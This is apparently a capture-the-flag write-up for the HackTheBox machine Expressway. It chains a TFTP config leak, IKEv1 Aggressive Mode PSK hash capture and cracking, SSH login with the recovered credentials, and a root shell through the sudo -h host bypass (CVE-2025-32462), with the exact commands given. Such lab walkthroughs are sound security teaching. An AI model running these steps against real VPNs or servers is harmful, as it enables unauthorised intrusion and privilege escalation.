🛣️Expressway
HTB Expressway — Detailed Solution Notes
Platform: HackTheBox | Machine: Expressway | OS: Linux | Difficulty: Easy | Vulnerability Types: TFTP Misconfiguration, IKEv1 Aggressive Mode PSK Hash Capture, CVE-2025-32462 (sudo -h bypass)
How Does a Hacker Think? — From an Open TFTP Server to Root
Expressway looks quiet from the outside. Only one TCP port is open — SSH — and there is no web application to poke at. The real attack surface is hiding in UDP. A TFTP server with no authentication is serving a Cisco router config file to anyone who asks. That config file contains a VPN pre-shared key and a username. From there, an IKEv1 Aggressive Mode handshake leaks a crackable hash. Cracking the hash gives SSH credentials. Once inside, a recent sudo vulnerability — CVE-2025-32462 — lets a low-privilege user impersonate another host and run any command as root.
1. Reconnaissance
Network Scan
nmap -p 22 -sV -sC 10.129.238.52
nmap -sU -p 68,69,500,4500 -sV 10.129.238.52The TCP scan returns only port 22 running OpenSSH 10.0p2 on Debian Linux. There is nothing else to attack over TCP. The UDP scan tells a different story. Port 69 is TFTP. Ports 500 and 4500 are ISAKMP and IPsec NAT-T — this machine is running a VPN service.
TFTP Enumeration
nmap -sU -p 69 --script tftp-enum 10.129.238.52The tftp-enum script finds one file: ciscortr.cfg. This is a Cisco router configuration file sitting on the TFTP server with no access control.
2. Config File Extraction — TFTP
How Does a Hacker Think?
TFTP has no authentication at all. Any client that knows a filename can download it. Network devices like routers and switches use TFTP to load their configs on boot — the config file has to be readable without a login because the device has no credentials loaded yet at that point. Administrators who leave TFTP running forget that anyone on the network — or in a CTF, anyone on the internet — can read whatever is being served.
tftp 10.129.238.52
tftp> get ciscortr.cfg
tftp> quit
cat ciscortr.cfgThe config file reveals the full VPN setup.
Key findings from the config:
username ike password *****
crypto isakmp client configuration group rtr-remote
key secret-password
crypto ipsec client ezvpn ezvpnclient
group 2 key secret-password
mode client
peer 192.168.100.1The VPN group name is rtr-remote. The pre-shared key is secret-password. The VPN username is ike. This is a Cisco EzVPN setup using IKEv1 with pre-shared key authentication.
3. IKEv1 Aggressive Mode — PSK Hash Capture
How Does a Hacker Think?
IKEv1 has two negotiation modes. Main Mode hides the identity of both parties during the handshake, which makes it secure. Aggressive Mode completes the handshake in three packets instead of six — faster, but the identity and the hash of the pre-shared key travel in the clear. If an attacker can trigger an Aggressive Mode handshake, they receive a hash that can be cracked offline with a wordlist. Cisco EzVPN typically uses Aggressive Mode because the client needs to identify its group name during the handshake.
ike-scan -M --aggressive --id=rtr-remote 10.129.238.52The server responds with a full Aggressive Mode handshake. Two details stand out: the identity is ike@expressway.htb, and XAUTH is advertised — meaning after the IKE tunnel is established, the server will ask for a username and password.
Capture the Hash
ike-scan -M --aggressive --id=rtr-remote \
--pskcrack=/home/kali/psk.txt 10.129.238.52The PSK hash is written to psk.txt. The hash format is IKEv1 Aggressive Mode with SHA1, which is hashcat mode 5400.
Crack the Hash
hashcat -m 5400 /home/kali/psk.txt /usr/share/wordlists/rockyou.txt --forceThe hash cracks quickly.
Credentials obtained: ike : freakingrockstarontheroad
4. Initial Foothold — SSH
ssh ike@10.129.238.52The SSH session opens. The ike user is a member of the proxy group in addition to their own group — a detail worth noting for later.
User flag obtained: /home/ike/user.txt ✅
5. Privilege Enumeration
How Does a Hacker Think?
After getting a shell, the first question is always: what can this user do that a normal user cannot? sudo -l checks for allowed sudo commands. SUID binaries run as their owner regardless of who executes them — any SUID binary owned by root is a potential escalation path. The proxy group membership also suggests this machine is running a proxy service that the ike user has some relationship to.
sudo -lThe ike user has no sudo privileges on this machine — at least not under the standard sudo binary.
find / -perm -4000 -type f 2>/dev/nullTwo entries stand out immediately:
/usr/sbin/exim4
/usr/local/bin/sudoThere are two sudo binaries on this system. The standard one at /usr/bin/sudo and a second one at /usr/local/bin/sudo. Checking the version:
/usr/local/bin/sudo --versionVersion 1.9.17 — vulnerable to CVE-2025-32462.
Squid Proxy Logs
The proxy group membership points toward Squid. Reading the access logs reveals a request to offramp.expressway.htb — a hostname that only appears on this internal network.
cat /var/log/squid/access.log.1The log shows a denied request: GET http://offramp.expressway.htb. This hostname becomes the key to the privilege escalation.
6. Privilege Escalation — CVE-2025-32462
How Does a Hacker Think?
CVE-2025-32462 is a logic flaw in the -h (host) option of sudo versions 1.8.8 through 1.9.17. The -h flag was designed to let users list their sudo privileges for a different host — useful in environments where one sudoers file is shared across many machines. The bug is that -h works not just with -l (list) but with actual command execution. When you run sudo -h somehost command, sudo evaluates the sudoers rules for somehost instead of the current machine. If those rules are more permissive, you get more access than you should. No exploit code is needed — it is a built-in sudo flag being used outside its intended context.
Check the Remote Host Rules
/usr/local/bin/sudo -l -h offramp.expressway.htbThe output shows that on offramp.expressway.htb, the ike user can run any command as root with no password.
User ike may run the following commands on offramp:
(root) NOPASSWD: ALLExploit
/usr/local/bin/sudo -h offramp.expressway.htb -u root /bin/bashA root shell opens on the local machine.
Root flag obtained: /root/root.txt ✅
Core Techniques Used
TFTP has no authentication by design. It was built for network devices that need to load a config before they have any credentials available. Leaving it exposed with sensitive files is equivalent to leaving those files on a public web server. The Cisco config in this case contained everything needed to impersonate a VPN client.
IKEv1 Aggressive Mode leaks a crackable hash. When a VPN server responds to an Aggressive Mode handshake, it sends the PSK hash derived from the pre-shared key before any encryption is established. That hash can be taken offline and attacked with a wordlist. The authentication method pre-share in the Cisco config was the signal that this attack was possible.
XAUTH adds a second credential layer to IKEv1. The VPN was configured to ask for a username and password after the IKE tunnel was established. In this case, the same credentials that appeared in the config also worked for SSH — credential reuse across services is common when a single administrator sets up both.
CVE-2025-32462 abuses a trusted sudo flag. The -h option was present in sudo for over 12 years before anyone noticed it could be used to run commands under the rules of a different host. The vulnerability requires that sudoers contain at least one host-specific rule — a configuration that is common in enterprise environments where one policy file covers many machines. Seeing a second sudo binary in /usr/local/bin was the signal to check its version and look for known CVEs.
Log files reveal internal hostnames. The Squid access log contained a request to offramp.expressway.htb — a hostname that was not discoverable through DNS or any other enumeration path. Reading proxy logs is a low-effort step that can expose internal network topology that the attacker would not otherwise know about.
Key Topics
- UDP Enumeration
- TFTP File Download
- Cisco Router Config Analysis
- IKEv1 / ISAKMP
- IKEv1 Aggressive Mode
- PSK Hash Capture with ike-scan
- Hashcat Mode 5400 (IKE-PSK SHA1)
- XAUTH
- Cisco EzVPN
- Squid Proxy Log Analysis
- SUID Binary Enumeration
- CVE-2025-32462
- sudo -h Host Bypass
- Privilege Escalation via Sudoers Host Rule
You might also want to look at these